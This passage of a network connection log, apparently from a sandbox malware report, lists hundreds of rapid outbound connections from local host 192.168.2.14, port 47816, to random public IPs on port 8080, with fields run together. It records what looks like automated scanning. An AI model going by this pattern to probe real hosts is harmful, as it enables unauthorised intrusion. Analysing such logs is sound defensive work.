                                              Nov 23, 2023 05:14:52.048065901 CET478168080192.168.2.1462.212.181.120
                                              Nov 23, 2023 05:14:52.048079014 CET478168080192.168.2.1462.195.0.168
                                              Nov 23, 2023 05:14:52.048083067 CET478168080192.168.2.1431.150.253.50
                                              Nov 23, 2023 05:14:52.048084021 CET478168080192.168.2.1485.168.119.114
                                              Nov 23, 2023 05:14:52.048095942 CET478168080192.168.2.1485.26.129.198
                                              Nov 23, 2023 05:14:52.048096895 CET478168080192.168.2.1462.218.108.203
                                              Nov 23, 2023 05:14:52.048099995 CET478168080192.168.2.1485.46.116.195
                                              Nov 23, 2023 05:14:52.048118114 CET478168080192.168.2.1494.69.62.249
                                              Nov 23, 2023 05:14:52.048126936 CET478168080192.168.2.1462.197.0.255
                                              Nov 23, 2023 05:14:52.048126936 CET478168080192.168.2.1431.3.213.253
                                              Nov 23, 2023 05:14:52.048130989 CET478168080192.168.2.1462.155.236.160
                                              Nov 23, 2023 05:14:52.048135042 CET478168080192.168.2.1462.82.252.66
                                              Nov 23, 2023 05:14:52.048140049 CET478168080192.168.2.1494.85.44.53
                                              Nov 23, 2023 05:14:52.048152924 CET478168080192.168.2.1462.211.124.226
                                              Nov 23, 2023 05:14:52.048161030 CET478168080192.168.2.1485.139.89.53
                                              Nov 23, 2023 05:14:52.048171043 CET478168080192.168.2.1431.168.252.237
                                              Nov 23, 2023 05:14:52.048171997 CET478168080192.168.2.1485.4.0.186
                                              Nov 23, 2023 05:14:52.048171043 CET478168080192.168.2.1494.76.98.144
                                              Nov 23, 2023 05:14:52.048183918 CET478168080192.168.2.1494.124.144.185
                                              Nov 23, 2023 05:14:52.048187017 CET478168080192.168.2.1462.231.238.0
                                              Nov 23, 2023 05:14:52.048194885 CET478168080192.168.2.1462.122.94.159
                                              Nov 23, 2023 05:14:52.048203945 CET478168080192.168.2.1462.165.206.128
                                              Nov 23, 2023 05:14:52.048212051 CET478168080192.168.2.1495.124.129.221
                                              Nov 23, 2023 05:14:52.048224926 CET478168080192.168.2.1431.95.110.16
                                              Nov 23, 2023 05:14:52.048228025 CET478168080192.168.2.1462.90.181.122
                                              Nov 23, 2023 05:14:52.048228979 CET478168080192.168.2.1495.49.11.47
                                              Nov 23, 2023 05:14:52.048233032 CET478168080192.168.2.1431.152.200.220
                                              Nov 23, 2023 05:14:52.048233986 CET478168080192.168.2.1462.187.28.129
                                              Nov 23, 2023 05:14:52.048248053 CET478168080192.168.2.1431.7.99.238
                                              Nov 23, 2023 05:14:52.048250914 CET478168080192.168.2.1495.85.251.81
                                              Nov 23, 2023 05:14:52.048250914 CET478168080192.168.2.1462.227.123.154
                                              Nov 23, 2023 05:14:52.048263073 CET478168080192.168.2.1485.244.17.205
                                              Nov 23, 2023 05:14:52.048264980 CET478168080192.168.2.1485.4.225.128
                                              Nov 23, 2023 05:14:52.048269987 CET478168080192.168.2.1494.128.11.46
                                              Nov 23, 2023 05:14:52.048288107 CET478168080192.168.2.1495.20.30.112
                                              Nov 23, 2023 05:14:52.048288107 CET478168080192.168.2.1494.150.182.159
                                              Nov 23, 2023 05:14:52.048299074 CET478168080192.168.2.1462.163.169.87
                                              Nov 23, 2023 05:14:52.048305035 CET478168080192.168.2.1485.0.31.206
                                              Nov 23, 2023 05:14:52.048324108 CET478168080192.168.2.1431.21.211.154
                                              Nov 23, 2023 05:14:52.048326015 CET478168080192.168.2.1495.203.242.218
                                              Nov 23, 2023 05:14:52.048331022 CET478168080192.168.2.1431.114.216.244
                                              Nov 23, 2023 05:14:52.048332930 CET478168080192.168.2.1485.119.144.46
                                              Nov 23, 2023 05:14:52.048343897 CET478168080192.168.2.1494.105.40.196
                                              Nov 23, 2023 05:14:52.048352957 CET478168080192.168.2.1495.84.166.91
                                              Nov 23, 2023 05:14:52.048352957 CET478168080192.168.2.1494.119.250.36
                                              Nov 23, 2023 05:14:52.048367977 CET478168080192.168.2.1431.132.134.27
                                              Nov 23, 2023 05:14:52.048367977 CET478168080192.168.2.1495.28.117.132
                                              Nov 23, 2023 05:14:52.048381090 CET478168080192.168.2.1495.12.105.98
                                              Nov 23, 2023 05:14:52.048382998 CET478168080192.168.2.1431.75.20.107
                                              Nov 23, 2023 05:14:52.048382998 CET478168080192.168.2.1485.197.80.232
                                              Nov 23, 2023 05:14:52.048392057 CET478168080192.168.2.1462.98.47.166
                                              Nov 23, 2023 05:14:52.048397064 CET478168080192.168.2.1485.136.20.177
                                              Nov 23, 2023 05:14:52.048413992 CET478168080192.168.2.1462.158.255.212
                                              Nov 23, 2023 05:14:52.048415899 CET478168080192.168.2.1495.90.123.48
                                              Nov 23, 2023 05:14:52.048425913 CET478168080192.168.2.1485.216.185.118
                                              Nov 23, 2023 05:14:52.048429012 CET478168080192.168.2.1431.51.33.25
                                              Nov 23, 2023 05:14:52.048429012 CET478168080192.168.2.1485.177.189.224
                                              Nov 23, 2023 05:14:52.048434019 CET478168080192.168.2.1462.216.136.5
                                              Nov 23, 2023 05:14:52.048440933 CET478168080192.168.2.1495.58.242.148
                                              Nov 23, 2023 05:14:52.048444986 CET478168080192.168.2.1431.176.185.21
                                              Nov 23, 2023 05:14:52.048451900 CET478168080192.168.2.1485.210.52.244
                                              Nov 23, 2023 05:14:52.048461914 CET478168080192.168.2.1485.23.213.130
                                              Nov 23, 2023 05:14:52.048469067 CET478168080192.168.2.1485.218.127.174
                                              Nov 23, 2023 05:14:52.048475027 CET478168080192.168.2.1485.247.0.182
                                              Nov 23, 2023 05:14:52.048485994 CET478168080192.168.2.1485.224.14.175
                                              Nov 23, 2023 05:14:52.048490047 CET478168080192.168.2.1494.25.93.98
                                              Nov 23, 2023 05:14:52.048490047 CET478168080192.168.2.1494.37.146.52
                                              Nov 23, 2023 05:14:52.048502922 CET478168080192.168.2.1495.16.254.104
                                              Nov 23, 2023 05:14:52.048507929 CET478168080192.168.2.1485.158.222.170
                                              Nov 23, 2023 05:14:52.048515081 CET478168080192.168.2.1495.29.144.47
                                              Nov 23, 2023 05:14:52.048522949 CET478168080192.168.2.1431.148.179.123
                                              Nov 23, 2023 05:14:52.048532009 CET478168080192.168.2.1431.225.176.27
                                              Nov 23, 2023 05:14:52.048532963 CET478168080192.168.2.1485.165.186.214
                                              Nov 23, 2023 05:14:52.048542023 CET478168080192.168.2.1494.36.101.226
                                              Nov 23, 2023 05:14:52.048547983 CET478168080192.168.2.1462.21.180.51
                                              Nov 23, 2023 05:14:52.048558950 CET478168080192.168.2.1462.119.174.146
                                              Nov 23, 2023 05:14:52.048568010 CET478168080192.168.2.1495.88.169.25
                                              Nov 23, 2023 05:14:52.048568010 CET478168080192.168.2.1494.143.244.13
                                              Nov 23, 2023 05:14:52.048578024 CET478168080192.168.2.1494.95.18.252
                                              Nov 23, 2023 05:14:52.048587084 CET478168080192.168.2.1485.154.216.169
                                              Nov 23, 2023 05:14:52.048594952 CET478168080192.168.2.1431.82.133.45
                                              Nov 23, 2023 05:14:52.048597097 CET478168080192.168.2.1462.228.253.189
                                              Nov 23, 2023 05:14:52.048608065 CET478168080192.168.2.1494.30.251.143
                                              Nov 23, 2023 05:14:52.048610926 CET478168080192.168.2.1495.35.88.7
                                              Nov 23, 2023 05:14:52.048619032 CET478168080192.168.2.1494.221.110.50
                                              Nov 23, 2023 05:14:52.048628092 CET478168080192.168.2.1485.85.70.102
                                              Nov 23, 2023 05:14:52.048640013 CET478168080192.168.2.1485.6.96.212
                                              Nov 23, 2023 05:14:52.048640013 CET478168080192.168.2.1485.166.42.5
                                              Nov 23, 2023 05:14:52.048651934 CET478168080192.168.2.1495.8.112.96
                                              Nov 23, 2023 05:14:52.048656940 CET478168080192.168.2.1431.178.32.245
                                              Nov 23, 2023 05:14:52.048662901 CET478168080192.168.2.1431.31.143.220
                                              Nov 23, 2023 05:14:52.048666954 CET478168080192.168.2.1485.213.129.227
                                              Nov 23, 2023 05:14:52.048679113 CET478168080192.168.2.1495.34.83.231
                                              Nov 23, 2023 05:14:52.048679113 CET478168080192.168.2.1462.7.229.39
                                              Nov 23, 2023 05:14:52.048680067 CET478168080192.168.2.1485.223.202.0
                                              Nov 23, 2023 05:14:52.048693895 CET478168080192.168.2.1495.1.23.56
                                              Nov 23, 2023 05:14:52.048693895 CET478168080192.168.2.1494.117.57.114
                                              Nov 23, 2023 05:14:52.048707008 CET478168080192.168.2.1462.35.62.189
                                              Nov 23, 2023 05:14:52.048710108 CET478168080192.168.2.1495.126.66.3
                                              Nov 23, 2023 05:14:52.048713923 CET478168080192.168.2.1462.65.64.156
                                              Nov 23, 2023 05:14:52.048728943 CET478168080192.168.2.1494.250.181.174
                                              Nov 23, 2023 05:14:52.048731089 CET478168080192.168.2.1485.90.190.155
                                              Nov 23, 2023 05:14:52.048732996 CET478168080192.168.2.1462.224.195.38
                                              Nov 23, 2023 05:14:52.048732996 CET478168080192.168.2.1431.220.213.55
                                              Nov 23, 2023 05:14:52.048736095 CET478168080192.168.2.1431.140.60.42
                                              Nov 23, 2023 05:14:52.048749924 CET478168080192.168.2.1431.254.145.197
                                              Nov 23, 2023 05:14:52.048751116 CET478168080192.168.2.1494.214.175.200
                                              Nov 23, 2023 05:14:52.048762083 CET478168080192.168.2.1462.102.175.20
                                              Nov 23, 2023 05:14:52.048763037 CET478168080192.168.2.1485.78.79.22
                                              Nov 23, 2023 05:14:52.048775911 CET478168080192.168.2.1462.34.235.236
                                              Nov 23, 2023 05:14:52.048788071 CET478168080192.168.2.1431.91.236.97
                                              Nov 23, 2023 05:14:52.048789978 CET478168080192.168.2.1462.250.15.51
                                              Nov 23, 2023 05:14:52.048798084 CET478168080192.168.2.1431.138.84.165
                                              Nov 23, 2023 05:14:52.048799992 CET478168080192.168.2.1485.159.68.194
                                              Nov 23, 2023 05:14:52.048800945 CET478168080192.168.2.1485.112.173.215
                                              Nov 23, 2023 05:14:52.048808098 CET478168080192.168.2.1485.197.214.198
                                              Nov 23, 2023 05:14:52.048808098 CET478168080192.168.2.1462.132.172.91
                                              Nov 23, 2023 05:14:52.048815012 CET478168080192.168.2.1495.58.191.141
                                              Nov 23, 2023 05:14:52.048821926 CET478168080192.168.2.1485.104.84.140
                                              Nov 23, 2023 05:14:52.048831940 CET478168080192.168.2.1462.249.56.131
                                              Nov 23, 2023 05:14:52.048837900 CET478168080192.168.2.1431.110.91.56
                                              Nov 23, 2023 05:14:52.048844099 CET478168080192.168.2.1495.147.240.136
                                              Nov 23, 2023 05:14:52.048846960 CET478168080192.168.2.1494.43.11.87
                                              Nov 23, 2023 05:14:52.048861027 CET478168080192.168.2.1462.182.216.156
                                              Nov 23, 2023 05:14:52.048861027 CET478168080192.168.2.1462.73.31.74
                                              Nov 23, 2023 05:14:52.048876047 CET478168080192.168.2.1462.144.219.173
                                              Nov 23, 2023 05:14:52.048877954 CET478168080192.168.2.1462.85.31.76
                                              Nov 23, 2023 05:14:52.048887014 CET478168080192.168.2.1495.185.140.65
                                              Nov 23, 2023 05:14:52.048890114 CET478168080192.168.2.1494.252.109.211
                                              Nov 23, 2023 05:14:52.048890114 CET478168080192.168.2.1485.115.76.208
                                              Nov 23, 2023 05:14:52.048894882 CET478168080192.168.2.1494.25.3.91
                                              Nov 23, 2023 05:14:52.048904896 CET478168080192.168.2.1462.121.217.112
                                              Nov 23, 2023 05:14:52.048909903 CET478168080192.168.2.1462.139.183.95
                                              Nov 23, 2023 05:14:52.048913002 CET478168080192.168.2.1462.162.166.254
                                              Nov 23, 2023 05:14:52.048919916 CET478168080192.168.2.1462.189.231.221
                                              Nov 23, 2023 05:14:52.048932076 CET478168080192.168.2.1485.179.217.67
                                              Nov 23, 2023 05:14:52.048932076 CET478168080192.168.2.1495.159.84.155
                                              Nov 23, 2023 05:14:52.048934937 CET478168080192.168.2.1462.146.60.61
                                              Nov 23, 2023 05:14:52.048949957 CET478168080192.168.2.1431.32.197.10
                                              Nov 23, 2023 05:14:52.048949957 CET478168080192.168.2.1431.222.99.112
                                              Nov 23, 2023 05:14:52.048963070 CET478168080192.168.2.1485.229.9.46
                                              Nov 23, 2023 05:14:52.048963070 CET478168080192.168.2.1485.235.183.75
                                              Nov 23, 2023 05:14:52.048969984 CET478168080192.168.2.1462.77.227.118
                                              Nov 23, 2023 05:14:52.048981905 CET478168080192.168.2.1485.173.116.198
                                              Nov 23, 2023 05:14:52.048984051 CET478168080192.168.2.1462.48.201.80
                                              Nov 23, 2023 05:14:52.048990011 CET478168080192.168.2.1494.10.20.134
                                              Nov 23, 2023 05:14:52.048999071 CET478168080192.168.2.1494.196.22.24
                                              Nov 23, 2023 05:14:52.049012899 CET478168080192.168.2.1494.99.31.140
                                              Nov 23, 2023 05:14:52.049015045 CET478168080192.168.2.1462.95.29.13
                                              Nov 23, 2023 05:14:52.049026966 CET478168080192.168.2.1462.174.81.11
                                              Nov 23, 2023 05:14:52.049032927 CET478168080192.168.2.1462.73.21.127
                                              Nov 23, 2023 05:14:52.049032927 CET478168080192.168.2.1494.32.142.144
                                              Nov 23, 2023 05:14:52.049046993 CET478168080192.168.2.1431.46.66.201
                                              Nov 23, 2023 05:14:52.049051046 CET478168080192.168.2.1485.33.52.110
                                              Nov 23, 2023 05:14:52.049051046 CET478168080192.168.2.1462.46.70.45
                                              Nov 23, 2023 05:14:52.049060106 CET478168080192.168.2.1431.188.180.202
                                              Nov 23, 2023 05:14:52.049062014 CET478168080192.168.2.1495.35.76.111
                                              Nov 23, 2023 05:14:52.049077988 CET478168080192.168.2.1462.39.42.136
                                              Nov 23, 2023 05:14:52.049079895 CET478168080192.168.2.1485.57.100.55
                                              Nov 23, 2023 05:14:52.049094915 CET478168080192.168.2.1494.92.52.234
                                              Nov 23, 2023 05:14:52.049096107 CET478168080192.168.2.1495.23.12.22
                                              Nov 23, 2023 05:14:52.049096107 CET478168080192.168.2.1495.37.106.201
                                              Nov 23, 2023 05:14:52.049103975 CET478168080192.168.2.1431.187.212.224
                                              Nov 23, 2023 05:14:52.049113035 CET478168080192.168.2.1431.82.32.85
                                              Nov 23, 2023 05:14:52.049123049 CET478168080192.168.2.1494.81.3.122
                                              Nov 23, 2023 05:14:52.049140930 CET478168080192.168.2.1495.144.66.20
                                              Nov 23, 2023 05:14:52.049140930 CET478168080192.168.2.1462.183.206.3
                                              Nov 23, 2023 05:14:52.049140930 CET478168080192.168.2.1494.18.186.224
                                              Nov 23, 2023 05:14:52.049143076 CET478168080192.168.2.1495.46.30.207
                                              Nov 23, 2023 05:14:52.049144983 CET478168080192.168.2.1462.136.106.67
                                              Nov 23, 2023 05:14:52.049146891 CET478168080192.168.2.1495.238.218.177
                                              Nov 23, 2023 05:14:52.049149990 CET478168080192.168.2.1495.138.177.229
                                              Nov 23, 2023 05:14:52.049155951 CET478168080192.168.2.1485.169.44.17
                                              Nov 23, 2023 05:14:52.049166918 CET478168080192.168.2.1462.34.197.161
                                              Nov 23, 2023 05:14:52.049166918 CET478168080192.168.2.1485.21.205.181
                                              Nov 23, 2023 05:14:52.049184084 CET478168080192.168.2.1431.218.195.43
                                              Nov 23, 2023 05:14:52.049192905 CET478168080192.168.2.1485.242.128.245
                                              Nov 23, 2023 05:14:52.049196005 CET478168080192.168.2.1431.161.9.162
                                              Nov 23, 2023 05:14:52.049206018 CET478168080192.168.2.1431.186.154.84
                                              Nov 23, 2023 05:14:52.049211025 CET478168080192.168.2.1494.149.54.185
                                              Nov 23, 2023 05:14:52.049212933 CET478168080192.168.2.1462.123.10.149
                                              Nov 23, 2023 05:14:52.049221039 CET478168080192.168.2.1431.138.218.206
                                              Nov 23, 2023 05:14:52.049221992 CET478168080192.168.2.1485.88.145.91
                                              Nov 23, 2023 05:14:52.049230099 CET478168080192.168.2.1431.148.214.125
                                              Nov 23, 2023 05:14:52.049249887 CET478168080192.168.2.1494.46.0.91
                                              Nov 23, 2023 05:14:52.049251080 CET478168080192.168.2.1462.107.226.1
                                              Nov 23, 2023 05:14:52.049254894 CET478168080192.168.2.1462.137.85.219
                                              Nov 23, 2023 05:14:52.049254894 CET478168080192.168.2.1462.17.143.75
                                              Nov 23, 2023 05:14:52.049274921 CET478168080192.168.2.1431.232.221.175
                                              Nov 23, 2023 05:14:52.049274921 CET478168080192.168.2.1495.11.215.159
                                              Nov 23, 2023 05:14:52.049278975 CET478168080192.168.2.1494.80.241.29
                                              Nov 23, 2023 05:14:52.049279928 CET478168080192.168.2.1462.218.158.172
                                              Nov 23, 2023 05:14:52.049283981 CET478168080192.168.2.1495.177.122.66
                                              Nov 23, 2023 05:14:52.049288034 CET478168080192.168.2.1462.79.32.56
                                              Nov 23, 2023 05:14:52.049300909 CET478168080192.168.2.1494.36.196.67
                                              Nov 23, 2023 05:14:52.049304008 CET478168080192.168.2.1485.175.57.218
                                              Nov 23, 2023 05:14:52.049308062 CET478168080192.168.2.1495.59.166.119
                                              Nov 23, 2023 05:14:52.049309015 CET478168080192.168.2.1495.33.7.33
                                              Nov 23, 2023 05:14:52.049318075 CET478168080192.168.2.1494.77.32.205
                                              Nov 23, 2023 05:14:52.049318075 CET478168080192.168.2.1462.15.93.0
                                              Nov 23, 2023 05:14:52.049325943 CET478168080192.168.2.1495.142.221.188
                                              Nov 23, 2023 05:14:52.049331903 CET478168080192.168.2.1494.43.216.36
                                              Nov 23, 2023 05:14:52.049351931 CET478168080192.168.2.1462.242.241.251
                                              Nov 23, 2023 05:14:52.049354076 CET478168080192.168.2.1485.245.97.123
                                              Nov 23, 2023 05:14:52.049354076 CET478168080192.168.2.1462.149.5.219
                                              Nov 23, 2023 05:14:52.049355030 CET478168080192.168.2.1431.241.18.219
                                              Nov 23, 2023 05:14:52.049364090 CET478168080192.168.2.1494.146.120.37
                                              Nov 23, 2023 05:14:52.049366951 CET478168080192.168.2.1494.67.141.44
                                              Nov 23, 2023 05:14:52.049369097 CET478168080192.168.2.1485.72.247.134
                                              Nov 23, 2023 05:14:52.049370050 CET478168080192.168.2.1462.207.114.135
                                              Nov 23, 2023 05:14:52.049369097 CET478168080192.168.2.1462.2.177.39
                                              Nov 23, 2023 05:14:52.049370050 CET478168080192.168.2.1495.102.112.84
                                              Nov 23, 2023 05:14:52.049377918 CET478168080192.168.2.1494.26.203.208
                                              Nov 23, 2023 05:14:52.049384117 CET478168080192.168.2.1494.212.189.44
                                              Nov 23, 2023 05:14:52.049397945 CET478168080192.168.2.1495.8.64.183
                                              Nov 23, 2023 05:14:52.049401999 CET478168080192.168.2.1495.133.143.101
                                              Nov 23, 2023 05:14:52.049401999 CET478168080192.168.2.1462.181.230.185
                                              Nov 23, 2023 05:14:52.049416065 CET478168080192.168.2.1485.206.92.92
                                              Nov 23, 2023 05:14:52.049417019 CET478168080192.168.2.1494.154.254.160
                                              Nov 23, 2023 05:14:52.049418926 CET478168080192.168.2.1485.6.115.114
                                              Nov 23, 2023 05:14:52.049432039 CET478168080192.168.2.1495.6.103.243
                                              Nov 23, 2023 05:14:52.049437046 CET478168080192.168.2.1495.168.222.65
                                              Nov 23, 2023 05:14:52.049446106 CET478168080192.168.2.1494.54.26.104
                                              Nov 23, 2023 05:14:52.049453974 CET478168080192.168.2.1495.30.16.216
                                              Nov 23, 2023 05:14:52.049454927 CET478168080192.168.2.1494.11.206.9
                                              Nov 23, 2023 05:14:52.049454927 CET478168080192.168.2.1462.249.152.4
                                              Nov 23, 2023 05:14:52.049468994 CET478168080192.168.2.1431.18.133.181
                                              Nov 23, 2023 05:14:52.049475908 CET478168080192.168.2.1494.30.175.159
                                              Nov 23, 2023 05:14:52.049478054 CET478168080192.168.2.1485.242.219.224
                                              Nov 23, 2023 05:14:52.049484015 CET478168080192.168.2.1431.122.52.129
                                              Nov 23, 2023 05:14:52.049494982 CET478168080192.168.2.1462.126.155.90
                                              Nov 23, 2023 05:14:52.049504995 CET478168080192.168.2.1431.168.245.213
                                              Nov 23, 2023 05:14:52.049505949 CET478168080192.168.2.1495.10.68.216
                                              Nov 23, 2023 05:14:52.049509048 CET478168080192.168.2.1495.135.108.239
                                              Nov 23, 2023 05:14:52.049527884 CET478168080192.168.2.1485.208.75.48
                                              Nov 23, 2023 05:14:52.049541950 CET478168080192.168.2.1431.129.226.135
                                              Nov 23, 2023 05:14:52.049542904 CET478168080192.168.2.1495.236.159.67
                                              Nov 23, 2023 05:14:52.049546003 CET478168080192.168.2.1494.31.179.43
                                              Nov 23, 2023 05:14:52.049550056 CET478168080192.168.2.1495.75.144.9
                                              Nov 23, 2023 05:14:52.049563885 CET478168080192.168.2.1494.187.83.110
                                              Nov 23, 2023 05:14:52.049568892 CET478168080192.168.2.1485.84.158.252
                                              Nov 23, 2023 05:14:52.049568892 CET478168080192.168.2.1462.193.19.53
                                              Nov 23, 2023 05:14:52.049582958 CET478168080192.168.2.1495.203.228.34
                                              Nov 23, 2023 05:14:52.049588919 CET478168080192.168.2.1485.109.112.185
                                              Nov 23, 2023 05:14:52.049588919 CET478168080192.168.2.1462.59.74.228
                                              Nov 23, 2023 05:14:52.049602032 CET478168080192.168.2.1495.79.211.219
                                              Nov 23, 2023 05:14:52.049602032 CET478168080192.168.2.1485.127.242.7
                                              Nov 23, 2023 05:14:52.049614906 CET478168080192.168.2.1494.242.51.55
                                              Nov 23, 2023 05:14:52.049622059 CET478168080192.168.2.1485.184.231.157
                                              Nov 23, 2023 05:14:52.049628019 CET478168080192.168.2.1485.66.15.146
                                              Nov 23, 2023 05:14:52.049633026 CET478168080192.168.2.1485.133.84.226
                                              Nov 23, 2023 05:14:52.049637079 CET478168080192.168.2.1485.253.152.19
                                              Nov 23, 2023 05:14:52.049648046 CET478168080192.168.2.1485.74.252.156
                                              Nov 23, 2023 05:14:52.049654961 CET478168080192.168.2.1495.249.166.14
                                              Nov 23, 2023 05:14:52.049654961 CET478168080192.168.2.1462.62.205.154
                                              Nov 23, 2023 05:14:52.049657106 CET478168080192.168.2.1485.252.100.33
                                              Nov 23, 2023 05:14:52.049669027 CET478168080192.168.2.1494.166.12.22
                                              Nov 23, 2023 05:14:52.049676895 CET478168080192.168.2.1494.96.2.95
                                              Nov 23, 2023 05:14:52.049681902 CET478168080192.168.2.1462.232.50.81
                                              Nov 23, 2023 05:14:52.049685955 CET478168080192.168.2.1462.211.213.38
                                              Nov 23, 2023 05:14:52.049695969 CET478168080192.168.2.1494.214.19.10
                                              Nov 23, 2023 05:14:52.049695969 CET478168080192.168.2.1495.64.16.229
                                              Nov 23, 2023 05:14:52.049711943 CET478168080192.168.2.1494.240.206.111
                                              Nov 23, 2023 05:14:52.049722910 CET478168080192.168.2.1431.3.216.88
                                              Nov 23, 2023 05:14:52.049725056 CET478168080192.168.2.1462.76.22.160
                                              Nov 23, 2023 05:14:52.049726009 CET478168080192.168.2.1494.123.27.57
                                              Nov 23, 2023 05:14:52.049726009 CET478168080192.168.2.1462.104.52.206
                                              Nov 23, 2023 05:14:52.049731970 CET478168080192.168.2.1431.158.246.136
                                              Nov 23, 2023 05:14:52.049734116 CET478168080192.168.2.1462.214.36.104
                                              Nov 23, 2023 05:14:52.049742937 CET478168080192.168.2.1494.127.22.140
                                              Nov 23, 2023 05:14:52.049752951 CET478168080192.168.2.1495.169.158.181
                                              Nov 23, 2023 05:14:52.049753904 CET478168080192.168.2.1485.53.168.41
                                              Nov 23, 2023 05:14:52.049761057 CET478168080192.168.2.1495.129.38.52
                                              Nov 23, 2023 05:14:52.049761057 CET478168080192.168.2.1462.124.3.253
                                              Nov 23, 2023 05:14:52.049772978 CET478168080192.168.2.1462.50.135.112
                                              Nov 23, 2023 05:14:52.049774885 CET478168080192.168.2.1494.98.241.141
                                              Nov 23, 2023 05:14:52.049781084 CET478168080192.168.2.1485.146.109.26
                                              Nov 23, 2023 05:14:52.049791098 CET478168080192.168.2.1462.145.35.213
                                              Nov 23, 2023 05:14:52.049793005 CET478168080192.168.2.1494.115.94.162
                                              Nov 23, 2023 05:14:52.049793959 CET478168080192.168.2.1494.232.192.59
                                              Nov 23, 2023 05:14:52.049807072 CET478168080192.168.2.1494.139.50.88
                                              Nov 23, 2023 05:14:52.049814939 CET478168080192.168.2.1494.104.28.128
                                              Nov 23, 2023 05:14:52.049818993 CET478168080192.168.2.1494.62.217.178
                                              Nov 23, 2023 05:14:52.049824953 CET478168080192.168.2.1485.191.74.136
                                              Nov 23, 2023 05:14:52.049824953 CET478168080192.168.2.1494.160.209.66
                                              Nov 23, 2023 05:14:52.049828053 CET478168080192.168.2.1462.185.62.170
                                              Nov 23, 2023 05:14:52.049828053 CET478168080192.168.2.1462.157.30.197
                                              Nov 23, 2023 05:14:52.049828053 CET478168080192.168.2.1485.7.231.2
                                              Nov 23, 2023 05:14:52.049849987 CET478168080192.168.2.1431.5.32.23
                                              Nov 23, 2023 05:14:52.049849987 CET478168080192.168.2.1431.227.66.16
                                              Nov 23, 2023 05:14:52.049851894 CET478168080192.168.2.1494.165.222.41
                                              Nov 23, 2023 05:14:52.049851894 CET478168080192.168.2.1431.234.255.217
                                              Nov 23, 2023 05:14:52.049865007 CET478168080192.168.2.1431.255.92.177
                                              Nov 23, 2023 05:14:52.049870014 CET478168080192.168.2.1495.127.228.111
                                              Nov 23, 2023 05:14:52.049875021 CET478168080192.168.2.1431.145.121.12
                                              Nov 23, 2023 05:14:52.049877882 CET478168080192.168.2.1495.47.21.107
                                              Nov 23, 2023 05:14:52.049890995 CET478168080192.168.2.1494.116.102.163
                                              Nov 23, 2023 05:14:52.049892902 CET478168080192.168.2.1485.244.133.94
                                              Nov 23, 2023 05:14:52.049899101 CET478168080192.168.2.1462.36.216.60
                                              Nov 23, 2023 05:14:52.049901009 CET478168080192.168.2.1495.43.2.177
                                              Nov 23, 2023 05:14:52.049920082 CET478168080192.168.2.1462.216.14.154
                                              Nov 23, 2023 05:14:52.049925089 CET478168080192.168.2.1485.227.2.90
                                              Nov 23, 2023 05:14:52.049925089 CET478168080192.168.2.1431.185.18.175
                                              Nov 23, 2023 05:14:52.049927950 CET478168080192.168.2.1494.222.3.38
                                              Nov 23, 2023 05:14:52.049932003 CET478168080192.168.2.1485.223.232.250
                                              Nov 23, 2023 05:14:52.049938917 CET478168080192.168.2.1485.184.30.219
                                              Nov 23, 2023 05:14:52.049951077 CET478168080192.168.2.1462.29.134.238
                                              Nov 23, 2023 05:14:52.049958944 CET478168080192.168.2.1485.229.123.102
                                              Nov 23, 2023 05:14:52.049959898 CET478168080192.168.2.1431.13.105.4
                                              Nov 23, 2023 05:14:52.049973965 CET478168080192.168.2.1431.52.249.210
                                              Nov 23, 2023 05:14:52.049976110 CET478168080192.168.2.1494.146.227.182
                                              Nov 23, 2023 05:14:52.049977064 CET478168080192.168.2.1431.234.52.153
                                              Nov 23, 2023 05:14:52.049989939 CET478168080192.168.2.1431.141.140.140
                                              Nov 23, 2023 05:14:52.049994946 CET478168080192.168.2.1494.72.188.71
                                              Nov 23, 2023 05:14:52.049998999 CET478168080192.168.2.1462.100.211.122
                                              Nov 23, 2023 05:14:52.050000906 CET478168080192.168.2.1495.183.15.1
                                              Nov 23, 2023 05:14:52.050007105 CET478168080192.168.2.1431.172.214.133
                                              Nov 23, 2023 05:14:52.050009012 CET478168080192.168.2.1431.163.95.209
                                              Nov 23, 2023 05:14:52.050009012 CET478168080192.168.2.1495.219.139.183
                                              Nov 23, 2023 05:14:52.050021887 CET478168080192.168.2.1494.130.116.38
                                              Nov 23, 2023 05:14:52.050030947 CET478168080192.168.2.1494.23.67.64
                                              Nov 23, 2023 05:14:52.050031900 CET478168080192.168.2.1462.178.21.91
                                              Nov 23, 2023 05:14:52.050036907 CET478168080192.168.2.1431.75.52.146
                                              Nov 23, 2023 05:14:52.050048113 CET478168080192.168.2.1462.221.102.189
                                              Nov 23, 2023 05:14:52.050050974 CET478168080192.168.2.1485.118.231.113
                                              Nov 23, 2023 05:14:52.050060034 CET478168080192.168.2.1431.208.141.198
                                              Nov 23, 2023 05:14:52.050064087 CET478168080192.168.2.1485.243.74.253
                                              Nov 23, 2023 05:14:52.050070047 CET478168080192.168.2.1462.157.194.96
                                              Nov 23, 2023 05:14:52.050079107 CET478168080192.168.2.1462.82.33.245
                                              Nov 23, 2023 05:14:52.050093889 CET478168080192.168.2.1495.207.36.87
                                              Nov 23, 2023 05:14:52.050095081 CET478168080192.168.2.1462.40.231.11
                                              Nov 23, 2023 05:14:52.050101042 CET478168080192.168.2.1494.247.167.169
                                              Nov 23, 2023 05:14:52.050105095 CET478168080192.168.2.1431.165.143.1
                                              Nov 23, 2023 05:14:52.050111055 CET478168080192.168.2.1494.142.57.53
                                              Nov 23, 2023 05:14:52.050116062 CET478168080192.168.2.1485.85.121.158
                                              Nov 23, 2023 05:14:52.050121069 CET478168080192.168.2.1494.20.216.140
                                              Nov 23, 2023 05:14:52.050129890 CET478168080192.168.2.1494.72.255.146
                                              Nov 23, 2023 05:14:52.050132990 CET478168080192.168.2.1431.200.167.138
                                              Nov 23, 2023 05:14:52.050144911 CET478168080192.168.2.1485.160.40.199
                                              Nov 23, 2023 05:14:52.050148010 CET478168080192.168.2.1431.221.58.29
                                              Nov 23, 2023 05:14:52.050149918 CET478168080192.168.2.1431.188.197.192
                                              Nov 23, 2023 05:14:52.050162077 CET478168080192.168.2.1494.20.248.18
                                              Nov 23, 2023 05:14:52.050163031 CET478168080192.168.2.1485.130.73.61
                                              Nov 23, 2023 05:14:52.050163031 CET478168080192.168.2.1431.41.41.101
                                              Nov 23, 2023 05:14:52.050170898 CET478168080192.168.2.1485.254.56.75
                                              Nov 23, 2023 05:14:52.050179958 CET478168080192.168.2.1462.248.33.74
                                              Nov 23, 2023 05:14:52.050184011 CET478168080192.168.2.1495.225.120.212
                                              Nov 23, 2023 05:14:52.050184965 CET478168080192.168.2.1494.120.45.73
